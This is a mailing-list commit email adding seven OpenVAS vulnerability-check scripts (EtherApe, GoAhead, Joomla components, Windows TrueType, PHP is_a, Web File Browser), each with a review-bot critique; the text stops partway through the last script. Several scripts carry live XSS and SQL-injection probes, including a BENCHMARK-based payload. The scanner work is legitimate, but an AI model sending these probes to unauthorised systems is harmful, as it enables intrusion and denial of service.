[Openvas-commits] r12061 - trunk/openvas-plugins/scripts

scm-commit@wald.intevation.org scm-commit at wald.intevation.org
Wed Nov 9 14:03:18 CET 2011


Author: antu123
Date: 2011-11-09 14:03:16 +0100 (Wed, 09 Nov 2011)
New Revision: 12061

Added:
   trunk/openvas-plugins/scripts/gb_etherape_rpc_call_parsing_dos_vuln.nasl
   trunk/openvas-plugins/scripts/gb_goahead_webserver_mult_stored_xss_vuln.nasl
   trunk/openvas-plugins/scripts/gb_joomla_mult_components_sql_inj_vuln.nasl
   trunk/openvas-plugins/scripts/gb_joomla_teams_sql_inj_vuln.nasl
   trunk/openvas-plugins/scripts/gb_ms_truetype_font_privilege_elevation_vuln.nasl
   trunk/openvas-plugins/scripts/gb_php_is_a_fun_arbitrary_code_exec_vuln_win.nasl
   trunk/openvas-plugins/scripts/gb_webfilebrowser_file_download_vuln.nasl
Log:
Added new plugins

Added: trunk/openvas-plugins/scripts/gb_etherape_rpc_call_parsing_dos_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_etherape_rpc_call_parsing_dos_vuln.nasl	2011-11-09 12:54:45 UTC (rev 12060)
+++ trunk/openvas-plugins/scripts/gb_etherape_rpc_call_parsing_dos_vuln.nasl	2011-11-09 13:03:16 UTC (rev 12061)
@@ -0,0 +1,109 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_etherape_rpc_call_parsing_dos_vuln.nasl 17841 2011-11-09 17:22:20Z nov $
+#
+# EtherApe RPC Packet Processing Denial of Service Vulnerability
+#
+# Authors:
+# Rachana Shetty <srachana at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(802340);
+  script_version("$Revision: $");
+  script_cve_id("CVE-2011-3369");
+  script_tag(name:"cvss_base", value:"5.0");
+  script_tag(name:"risk_factor", value:"Medium");
+  script_tag(name:"last_modification", value:"$Date: $");
+  script_tag(name:"creation_date", value:"2011-11-08 17:22:20 +0530 (Tue, 08 Nov 2011)");
+  script_name("EtherApe RPC Packet Processing Denial of Service Vulnerability");
+  desc = "
+  Overview: This host is installed with EtherApe and is prone to denial of
+  service vulnerabilities.
+
+  Vulnerability Insight:
+  The flaw is due to an error in the add_conversation function in
+  'conversations.c' when processing specially crafted RPC packet.
+
+  Impact:
+  Successful exploitation allows remote attackers to cause a NULL pointer
+  dereference or cause a denial of service.
+
+  Impact Level: Application
+
+  Affected Software/OS:
+  EtherApe version prior to 0.9.12
+
+  Fix: Upgrade to EtherApe version 0.9.12 or later,
+  For updates refer, http://etherape.sourceforge.net/
+
+  References:
+  http://osvdb.org/show/osvdb/75609
+  http://secunia.com/advisories/45989
+  http://etherape.sourceforge.net/NEWS.html
+  http://www.openwall.com/lists/oss-security/2011/09/19/4
+  http://www.openwall.com/lists/oss-security/2011/09/22/1
+  http://sourceforge.net/tracker/?func=detail&aid=3309061&group_id=2712&atid=102712 ";
+
+  script_description(desc);
+  script_summary("Check for the version of EtherApe");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (c) 2011 Greenbone Networks GmbH");
+  script_family("Denial of Service");
+  exit(0);
+}
+
+include("ssh_func.inc");
+include("version_func.inc");
+
+## Open the socket
+sock = ssh_login_or_reuse_connection();
+if(!sock){
+  exit(0);
+}
+
+## Confirm Linux, as SSH can be instslled on Windows as well
+result = ssh_cmd(socket:sock, cmd:"uname");
+if("Linux" >!< result){
+  exit(0);
+}
+
+etherapeName = find_file(file_name:"etherape", file_path:"/", useregex:TRUE,
+                         regexpar:"$", sock:sock);
+
+foreach binaryName (etherapeName)
+{
+  ## Get the EtherApe version from command
+  etherVer = get_bin_version(full_prog_name:chomp(binaryName), version_argv:"--version",
+                             ver_pattern:"GNOME EtherApe ([0-9.]+)", sock:sock);
+
+  if(etherVer[1])
+  {
+    ## Check for EtherApe Version less than 0.9.12
+    if(version_is_less(version:etherVer[1], test_version:"0.9.12"))
+    {
+      security_warning(0);
+      ssh_close_connection();
+      exit(0);
+    }
+  }
+}
+
+ssh_close_connection();
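Review bot: The loop at the end runs every file named `etherape` that `find_file` locates anywhere under `/`, so `get_bin_version(full_prog_name:chomp(binaryName), ...)` makes the scanner's SSH account execute whatever an unprivileged local user has dropped under that name in a world-writable directory. Restrict `file_path` to the usual install prefixes (or skip candidates outside them before calling `get_bin_version`) and state the execution side effect in a comment above the loop, since the `uname` gate on L109–L112 only limits the check to Linux, not to trusted paths. The comment on L108 also misspells "installed" as `instslled`.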

Added: trunk/openvas-plugins/scripts/gb_goahead_webserver_mult_stored_xss_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_goahead_webserver_mult_stored_xss_vuln.nasl	2011-11-09 12:54:45 UTC (rev 12060)
+++ trunk/openvas-plugins/scripts/gb_goahead_webserver_mult_stored_xss_vuln.nasl	2011-11-09 13:03:16 UTC (rev 12061)
@@ -0,0 +1,110 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_goahead_webserver_mult_stored_xss_vuln.nasl 18413 2011-11-08 16:16:16Z nov $
+#
+# GoAhead Webserver Multiple Stored Cross Site Scripting Vulnerabilities
+#
+# Authors:
+# Sooraj KS <kssooraj at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(802270);
+  script_version("$Revision: $");
+  script_cve_id("CVE-2011-4273");
+  script_bugtraq_id(50039);
+  script_tag(name:"cvss_base", value:"4.3");
+  script_tag(name:"risk_factor", value:"Medium");
+  script_tag(name:"creation_date", value:"2011-11-08 16:16:16 +0530 (Tue, 08 Nov 2011)");
+  script_tag(name:"last_modification", value:"$Date: $");
+  script_name("GoAhead Webserver Multiple Stored Cross Site Scripting Vulnerabilities");
+  desc = "
+  Overview: This host is running GoAhead Webserver and is prone to multiple
+  stored cross site scripting vulnerabilities.
+
+  Vulnerability Insight:
+  Multiple flaws are caused due to improper validation of user-supplied input
+  via the 'group' parameter to goform/AddGroup, related to addgroup.asp,
+  the 'url' parameter to goform/AddAccessLimit, related to addlimit.asp,
+  or the 'user' or 'group' parameter to goform/AddUser, related to adduser.asp
+
+  Impact:
+  Successful exploitation will allow remote attackers to insert arbitrary HTML
+  and script code, which will be executed in a user's browser session in the
+  context of an affected site.
+
+  Impact Level: Application
+
+  Affected Software/OS:
+  GoAhead Webserver version 2.18
+
+  Fix: No solution or patch is available as on 8th November, 2011. Information
+  regarding this issue will be updated once the solution details are available.
+  For updates refer, http://www.goahead.com/products/webserver/default.aspx
+
+  References:
+  http://osvdb.org/show/osvdb/76845
+  http://osvdb.org/show/osvdb/76846
+  http://osvdb.org/show/osvdb/76847
+  http://www.kb.cert.org/vuls/id/384427 ";
+
+  script_description(desc);
+  script_summary("Check if GoAhead Webserver is vulnerable to Cross-Site Scripting");
+  script_category(ACT_ATTACK);
+  script_copyright("Copyright (C) 2011 Greenbone Networks GmbH");
+  script_family("Web Servers");
+  script_require_ports("Services/www", 80);
+  exit(0);
+}
+
+
+include("http_func.inc");
+include("http_keepalive.inc");
+
+## Get HTTP Port
+port = get_http_port(default:80);
+
+## Check Port State
+if(!get_port_state(port)) {
+  exit(0);
+}
+
+## Check Banner And Confirm Application
+banner = get_http_banner(port:port);
+if("Server: GoAhead-Webs" >!< banner) {
+  exit(0);
+}
+
+## Stored XSS (Not a safe check)
+if(safe_checks()){
+  exit(0);
+}
+
+## Construct Attack Request
+req = http_post(port:port, item:"/goform/AddGroup/addgroup.asp",
+                data:"group=<script>alert(doucment.cookie)</script>" +
+                     "&privilege=4&method=1&enabled=on&ok=OK");
+## Try XSS Attack
+res = http_keepalive_send_recv(port:port, data:req);
+
+## Confirm exploit worked by checking the response
+if("<script>alert(doucment.cookie)</script>" >< res){
+  security_warning(port);
+}
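Review bot: The confirmation on L249 searches the response to the POST itself, so it only shows that the `group` field is reflected, not that the value was stored; a stored-XSS verdict needs the marker to appear in a later page render. The request also creates a persistent group with `privilege=4` on the device and never removes it, and that side effect is worth stating in `desc` because `safe_checks()` on L237 is the only gate. The description gives the endpoint as `goform/AddGroup` related to `addgroup.asp`, while the request goes to `/goform/AddGroup/addgroup.asp`; I can't tell from here which path the server expects, so that is worth verifying. The misspelled `doucment` in both the payload and the match string looks accidental; a plain marker such as `OpenVAS-XSS-Test` would make the intent explicit and keeps the probe inert.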

Added: trunk/openvas-plugins/scripts/gb_joomla_mult_components_sql_inj_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_joomla_mult_components_sql_inj_vuln.nasl	2011-11-09 12:54:45 UTC (rev 12060)
+++ trunk/openvas-plugins/scripts/gb_joomla_mult_components_sql_inj_vuln.nasl	2011-11-09 13:03:16 UTC (rev 12061)
@@ -0,0 +1,128 @@
+##############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_joomla_mult_components_sql_inj_vuln.nasl 17758 2011-11-09 15:10:29 nov $
+#
+# Joomla Multiple Components SQL Injection Vulnerabilities
+#
+# Authors:
+# Madhuri D <dmadhuri at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(802196);
+  script_version("$Revision: $");
+  script_cve_id("CVE-2010-4927", "CVE-2010-4928", "CVE-2010-4929", "CVE-2010-4937",
+                "CVE-2010-4945", "CVE-2010-4902", "CVE-2010-4865", "CVE-2010-4902");
+  script_bugtraq_id(43319, 33254, 43415, 42334, 42986, 43605,42986);
+  script_tag(name:"cvss_base", value:"7.5");
+  script_tag(name:"risk_factor", value:"High");
+  script_tag(name:"last_modification", value:"$Date: $");
+  script_tag(name:"creation_date", value:"2011-11-03 15:42:01 +0200 (Thu, 03 Nov 2011)");
+  script_name("Joomla Multiple Components SQL Injection Vulnerabilities");
+  desc = "
+  Overview: This host is running Joomla with multiple components and is
+  prone to SQL injection vulnerabilities.
+
+  Vulnerability Insight:
+  For more information about vulnerability refer the references section.
+
+  Impact:
+  Successful exploitation will let attackers to manipulate SQL queries by
+  injecting arbitrary SQL code.
+
+  Impact Level: Application.
+
+  Affected Software/OS:
+  Joomla Joostina component
+  Joomla sgicatalog component
+  Joomla Amblog component version 1.0
+  Joomla Clantools Component version 1.2.3
+  Joomla CamelcityDB component version 2.2
+  Joomla Clantools Component version 1.2.3
+  Joomla Restaurant Guide component version 1.0.0
+  Joomla Aardvertiser Component versions 2.1 and 2.1.1
+
+  Fix: For solution or patch refer the refer section.
+  For updates refer, http://extensions.joomla.org/extensions/
+
+  References:
+  http://secunia.com/advisories/40932
+  http://secunia.com/advisories/41322
+  http://xforce.iss.net/xforce/xfdb/62151
+  http://www.exploit-db.com/exploits/14530/
+  http://www.exploit-db.com/exploits/14596/
+  http://www.exploit-db.com/exploits/14530/
+  http://www.exploit-db.com/exploits/15040/
+  http://www.exploit-db.com/exploits/15157/
+  http://www.exploit-db.com/exploits/14902/
+  http://packetstormsecurity.org/files/92305/joomlacamelcitydb2-sql.txt
+  http://packetstormsecurity.org/files/view/105704/joomlasgicatalog-sql.txt ";
+
+  script_description(desc);
+  script_summary("Check if Joomla components are vulnerable for SQL injection attack");
+  script_category(ACT_ATTACK);
+  script_copyright("Copyright (C) 2011 Greenbone Networks GmbH");
+  script_family("Web application abuses");
+  script_dependencies("joomla_detect.nasl");
+  script_require_ports("Services/www", 80);
+  exit(0);
+}
+
+include("http_func.inc");
+include("version_func.inc");
+include("http_keepalive.inc");
+
+## Get HTTP port
+joomlaPort = get_http_port(default:80);
+if(!joomlaPort){
+  exit(0);
+}
+
+## Check Host Supports PHP
+if(!can_host_php(port:joomlaPort)){
+  exit(0);
+}
+
+## Get the dir from KB
+if(!joomlaDir = get_dir_from_kb(port:joomlaPort, app:"joomla")){
+  exit(0);
+}
+
+## Make list of vulnerable pages
+pages = make_list("/index.php?option=com_restaurantguide&view=country&id='&Itemid=69",
+                  "/index.php?option=com_ezautos&Itemid=49&id=1&task=helpers&firstCode='",
+                  "/index.php?option=com_amblog&task=editsave&articleid='",
+                  "/index.php?option=com_camelcitydb2&view=all&Itemid=15",
+                  "/index.php?option=com_jeguestbook&view=item_detail&d_itemid='",
+                  "/index.php?option=com_clantools&squad='",
+                  "'/index.php?option=com_sgicatalog&task=view&lang=en&id='",
+                  "/index.php?option=com_aardvertiser&amp;cat_name='x+AND+'1'='1&amp;task=view");
+
+foreach page (pages)
+{
+  if(http_vuln_check(port:joomlaPort, url: joomlaDir + page, pattern: "<b>" +
+                 "Warning</b>:  Invalid argument supplied for foreach\(\)") ||
+  (http_vuln_check(port:joomlaPort, url:joomlaDir + page, pattern:"You have an error in " +
+                        "your SQL syntax;")))
+  {
+    security_warning(joomlaPort);
+    exit(0);
+  }
+}
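Review bot: The seventh entry in `pages` on L372 starts with a stray `'`, so the request is built from `joomlaDir + "'/index.php?option=com_sgicatalog..."` and the sgicatalog component is never actually tested; it should read `"/index.php?option=com_sgicatalog&task=view&lang=en&id='"`. The first `http_vuln_check` pattern on L377–L378 matches a generic PHP foreach warning, which is not evidence of SQL injection and will flag any page that emits it; only the `You have an error in your SQL syntax;` match on L379–L380 confirms the issue. Each page is also requested twice; one `http_vuln_check` with an alternation pattern would halve the traffic. The metadata repeats `CVE-2010-4902` on L288–L289, bugtraq id `42986` on L290, the exploit-db 14530 reference and the Clantools line in the affected list.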

Added: trunk/openvas-plugins/scripts/gb_joomla_teams_sql_inj_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_joomla_teams_sql_inj_vuln.nasl	2011-11-09 12:54:45 UTC (rev 12060)
+++ trunk/openvas-plugins/scripts/gb_joomla_teams_sql_inj_vuln.nasl	2011-11-09 13:03:16 UTC (rev 12061)
@@ -0,0 +1,113 @@
+##############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_joomla_teams_sql_inj_vuln.nasl 17758 2011-11-09 13:10:29 nov $
+#
+# Joomla 'Teams' Component SQL Injection Vulnerability
+#
+# Authors:
+# Madhuri D <dmadhuri at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(802189);
+  script_version("$Revision: $");
+  script_cve_id("CVE-2010-4941");
+  script_tag(name:"cvss_base", value:"7.5");
+  script_tag(name:"risk_factor", value:"High");
+  script_tag(name:"last_modification", value:"$Date: $");
+  script_tag(name:"creation_date", value:"2011-11-09 13:02:45 +0530 (Wed, 09 Nov 2011)");
+  script_name("Joomla 'Teams' Component SQL Injection Vulnerability");
+  desc = "
+  Overview: This host is running Joomla with Teams component and is prone to
+  SQL injection vulnerability.
+
+  Vulnerability Insight:
+  Input passed via the 'PlayerID' parameter to 'index.php' is not properly
+  sanitised before being used in SQL queries.
+
+  Impact:
+  Successful exploitation will let attackers to manipulate SQL queries by
+  injecting arbitrary SQL code.
+
+  Impact Level: Application.
+
+  Affected Software/OS:
+  Joomla Team Component version 1_1028_100809_1711
+
+  Fix: No solution or patch is available as on 08th November, 2011. Information
+  regarding this issue will be updated once the solution details are available.
+  For updates refer, http://joomla-clantools.de/downloads/cat_view/34-komponenten.html
+
+  References:
+  http://secunia.com/advisories/40933
+  http://www.exploit-db.com/exploits/14598/
+  http://www.securityfocus.com/archive/1/archive/1/512974/100/0/threaded ";
+
+  script_description(desc);
+  script_summary("Check if Joomla Teams component is vulnerable for SQL Injection attack");
+  script_category(ACT_ATTACK);
+  script_copyright("Copyright (C) 2011 Greenbone Networks GmbH");
+  script_family("Web application abuses");
+  script_dependencies("joomla_detect.nasl");
+  script_require_ports("Services/www", 80);
+  exit(0);
+}
+
+
+include("http_func.inc");
+include("version_func.inc");
+include("http_keepalive.inc");
+
+## Get HTTP port
+joomlaPort = get_http_port(default:80);
+if(!joomlaPort){
+  exit(0);
+}
+
+## Check Host Supports PHP
+if(!can_host_php(port:joomlaPort)){
+  exit(0);
+}
+
+## Get the dir from KB
+if(!joomlaDir = get_dir_from_kb(port:joomlaPort, app:"joomla")){
+  exit(0);
+}
+
+## Try an exploit
+filename = string(joomlaDir + "/index.php");
+host = get_host_name();
+postData = "FirstName=OpenVAS-SQL-Test&LastName=SecPod&Notes=sds&TeamNames" +
+           "[1]=on&UniformNumber[1]=1&Active=Y&cid[]=&PlayerID=-1 OR (SELECT" +
+           "(IF(0x41=0x41,BENCHMARK(99999999,NULL),NULL)))&option=com_teams&" +
+           "task=save&controller=player";
+
+## Construct post request
+sndReq = string("POST ", filename, " HTTP/1.1\r\n",
+                "Host: ", host, "\r\n",
+                "Content-Type: application/x-www-form-urlencoded\r\n",
+                "Content-Length: ", strlen(postData), "\r\n\r\n",
+                postData);
+rcvRes = http_keepalive_send_recv(port:joomlaPort, data:sndReq);
+
+## Confirm the exploit
+if("OpenVAS-SQL-Test" >< rcvRes && "SecPod" >< rcvRes){
+  security_hole(joomlaPort);
+}
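Review bot: The verdict on L502 only checks that `OpenVAS-SQL-Test` and `SecPod` are echoed back, which a re-rendered save form would do with or without injection, so `security_hole` reports reflection of the posted fields rather than a confirmed SQL injection. At the same time the `PlayerID` value carries `BENCHMARK(99999999,NULL)`, which makes the target database burn CPU on every scan and, if the save succeeds, leaves a player record behind; neither side effect is gated by `safe_checks()` or mentioned in `desc`. Add `if(safe_checks()){ exit(0); }` before building `postData`, document the persistent record, and tie the verdict to an observation that actually depends on the injected expression rather than on the echoed names. The spaces and parentheses in `postData` are also sent unencoded in an `application/x-www-form-urlencoded` body, so how the target parses them is uncertain.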

Added: trunk/openvas-plugins/scripts/gb_ms_truetype_font_privilege_elevation_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_ms_truetype_font_privilege_elevation_vuln.nasl	2011-11-09 12:54:45 UTC (rev 12060)
+++ trunk/openvas-plugins/scripts/gb_ms_truetype_font_privilege_elevation_vuln.nasl	2011-11-09 13:03:16 UTC (rev 12061)
@@ -0,0 +1,109 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_ms_truetype_font_privilege_elevation_vuln.nasl 18377 2011-11-07 16:44:35Z nov $
+#
+# Microsoft Windows TrueType Font Parsing Privilege Elevation Vulnerability
+#
+# Authors:
+# Madhuri D <dmadhuri at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(802500);
+  script_version("$Revision: $");
+  script_cve_id("CVE-2011-3402");
+  script_bugtraq_id(50462);
+  script_tag(name:"cvss_base", value:"9.3");
+  script_tag(name:"risk_factor", value:"Critical");
+  script_tag(name:"last_modification", value:"$Date: $");
+  script_tag(name:"creation_date", value:"2011-11-07 16:44:35 +0530 (Mon, 07 Nov 2011)");
+  script_name("Microsoft Windows TrueType Font Parsing Privilege Elevation Vulnerability");
+  desc = "
+  Overview:
+  The host is installed with Microsoft Windows operating system and is prone to
+  pivilege escalation vulnerability.
+
+  Vulnerability Insight:
+  The flaw is caused due to due to an error within the Win32k kernel-mode
+  driver when parsing TrueType fonts.
+
+  Impact:
+  Successful exploitation could allow attackers to execute arbitrary code with
+  kernel-level privileges. Failed exploit attempts may result in a
+  denial-of-service condition.
+
+  Impact Level: System
+
+  Affected Software/OS:
+  Microsoft Windows 7 Service Pack 1 and prior
+  Microsoft Windows XP Service Pack 3 and prior
+  Microsoft Windows Vista Service Pack 2 and prior
+  Microsoft Windows Server 2008 Service Pack 2 and prior
+  Microsoft Windows server 2003 Service Pack 2 and prior
+
+  Fix: Apply the workaround from below link,
+  http://support.microsoft.com/kb/2639658
+
+  References:
+  http://secunia.com/advisories/46724/
+  http://support.microsoft.com/kb/2639658
+  http://technet.microsoft.com/en-us/security/advisory/2639658 ";
+
+  script_description(desc);
+  script_summary("Check if t2embed.dll is accessible");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (c) 2011 Greenbone Networks GmbH");
+  script_family("Windows");
+  script_dependencies("secpod_reg_enum.nasl");
+  script_require_ports(139, 445);
+  exit(0);
+}
+
+
+include("smb_nt.inc");
+include("secpod_reg.inc");
+include("secpod_smb_func.inc");
+
+## Check for OS
+if(hotfix_check_sp(xp:4, win2003:3, winVista:3, win2008:3, win7:2) <= 0){
+  exit(0);
+}
+
+## Get System Path
+sysPath = smb_get_systemroot();
+if(!sysPath ){
+  exit(0);
+}
+
+dllPath = sysPath + "\system32\t2embed.dll";
+
+## Exit if file does not exist
+if(!dllPath){
+ exit(0);
+}
+
+share = ereg_replace(pattern:"([A-Z]):.*", replace:"\1$", string:dllPath);
+file = ereg_replace(pattern:"[A-Z]:(.*)", replace:"\1", string:dllPath);
+
+## Check if file is accessible by checking its size
+dllSize = get_file_size(file:file, share:share);
+if(dllSize != NULL){
+  security_hole(0);
+}
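Review bot: The `if(!dllPath)` guard on L608–L610 can never fire, because `dllPath` was just produced by string concatenation on L605 and is always non-empty; the comment `## Exit if file does not exist` describes a check the code does not make, and L607–L610 can simply be deleted since the real presence test is `get_file_size` on L616. The verdict then fires whenever `t2embed.dll` is readable over SMB, which presumably reports the absence of the KB2639658 access-restriction workaround rather than the state of any binary; saying so in `desc` would help users interpret the result. The description also has `pivilege` on L551 and `due to due to` on L554.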

Added: trunk/openvas-plugins/scripts/gb_php_is_a_fun_arbitrary_code_exec_vuln_win.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_php_is_a_fun_arbitrary_code_exec_vuln_win.nasl	2011-11-09 12:54:45 UTC (rev 12060)
+++ trunk/openvas-plugins/scripts/gb_php_is_a_fun_arbitrary_code_exec_vuln_win.nasl	2011-11-09 13:03:16 UTC (rev 12061)
@@ -0,0 +1,98 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_php_is_a_fun_arbitrary_code_exec_vuln_win.nasl 18420 2011-11-08 13:11:11Z nov $
+#
+# PHP 'is_a()' Function Remote Arbitrary Code Execution Vulnerability (Windows)
+#
+# Authors:
+# Madhuri D <dmadhuri at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(802504);
+  script_version("$Revision: $");
+  script_tag(name:"last_modification", value:"$Date: $");
+  script_tag(name:"creation_date", value:"2011-11-08 13:11:11 +0530 (Tue, 08 Nov 2011)");
+  script_cve_id("CVE-2011-3379");
+  script_bugtraq_id(49754);
+  script_tag(name:"cvss_base", value:"7.5");
+  script_tag(name:"risk_factor", value:"High");
+  script_name("PHP 'is_a()' Function Remote Arbitrary Code Execution Vulnerability (Windows)");
+  desc = "
+  Overview: This host is installed with PHP and is prone to remote arbitrary
+  code execution vulnerability.
+
+  Vulnerability Insight:
+  The flaw is caused due to error in 'is_a()' function. It receives strings as
+  first argument, which can lead to the '__autoload()' function being called
+  unexpectedly and do not properly verify input in their '__autoload()'
+  function, which leads to an unexpected attack vectors.
+
+  Impact:
+  Successful exploitation could allow remote attackers to execute arbitrary PHP
+  code by including arbitrary files from remote resources.
+
+  Impact Level: Application/System
+
+  Affected Software/OS:
+  PHP Version 5.3.7 and 5.3.8 on windows.
+
+  Fix: No solution or patch is available as on 8th November, 2011. Information
+  regarding this issue will be updated once the solution details are available.
+  For updates refer, http://php.net/downloads.php
+
+  Workaround:
+  Apply the workaround for PHP from below link,
+  http://www.byte.nl/blog/2011/09/23/security-bug-in-is_a-function-in-php-5-3-7-5-3-8/
+
+  *****
+  NOTE : Ignore this warning, if above workaround has been applied.
+  *****
+
+  References:
+  http://secunia.com/advisories/46107/
+  https://bugzilla.redhat.com/show_bug.cgi?id=741020
+  http://www.securityfocus.com/archive/1/519770/30/0/threaded
+  http://www.byte.nl/blog/2011/09/23/security-bug-in-is_a-function-in-php-5-3-7-5-3-8/ ";
+
+  script_description(desc);
+  script_summary("Check for the version of PHP");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (C) 2011 Greenbone Networks GmbH");
+  script_family("General");
+  script_dependencies("secpod_php_detect_win.nasl");
+  script_require_keys("PHP/Ver/win");
+  exit(0);
+}
+
+
+include("version_func.inc");
+
+## Get version from KB
+phpVer = get_kb_item("PHP/Ver/win");
+
+if(phpVer != NULL)
+{
+  ##Check for PHP version
+  if(version_is_equal(version:phpVer, test_version:"5.3.7") ||
+     version_is_equal(version:phpVer, test_version:"5.3.8")){
+    security_hole(0);
+  }
+}

Added: trunk/openvas-plugins/scripts/gb_webfilebrowser_file_download_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_webfilebrowser_file_download_vuln.nasl	2011-11-09 12:54:45 UTC (rev 12060)
+++ trunk/openvas-plugins/scripts/gb_webfilebrowser_file_download_vuln.nasl	2011-11-09 13:03:16 UTC (rev 12061)
@@ -0,0 +1,121 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_webfilebrowser_file_download_vuln.nasl 18358 2011-11-08 17:09:26Z nov $
+#
+# Web File Browser 'act' Parameter File Download Vulnerability
+#
+# Authors:
+# Rachana Shetty <srachana at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(802341);
+  script_version("$Revision: $");
+  script_bugtraq_id(50508);
+  script_tag(name:"cvss_base", value:"7.5");
+  script_tag(name:"risk_factor", value:"High");
+  script_tag(name:"last_modification", value:"$Date: $");
+  script_tag(name:"creation_date", value:"2011-11-08 17:09:26 +0530 (Tue, 08 Nov 2011)");
+  script_name("Web File Browser 'act' Parameter File Download Vulnerability");
+  desc = "
+  Overview:
+  This host is running with Web File Browser and is prone to file download
+  vulnerability.
+
+  Vulnerability Insight:
+  The flaw is caused due to input validation error in 'act' parameter in
+  'webFileBrowser.php', which allows attackers to download arbitrary files
+  via a '../'(dot dot) sequences.
+
+  Impact:
+  Successful exploitation could allow attackers to download and read arbitrary
+  files on the affected application.
+
+  Impact Level: Application
+
+  Affected Software/OS:
+  Web File Browser versions 0.4b14 and prior
+
+  Fix: No solution or patch is available as on 09th November, 2011. Information
+  regarding this issue will be updated once the solution details are available.
+  For updates refer, http://webfilebrowser.sourceforge.net/
+
+  References:
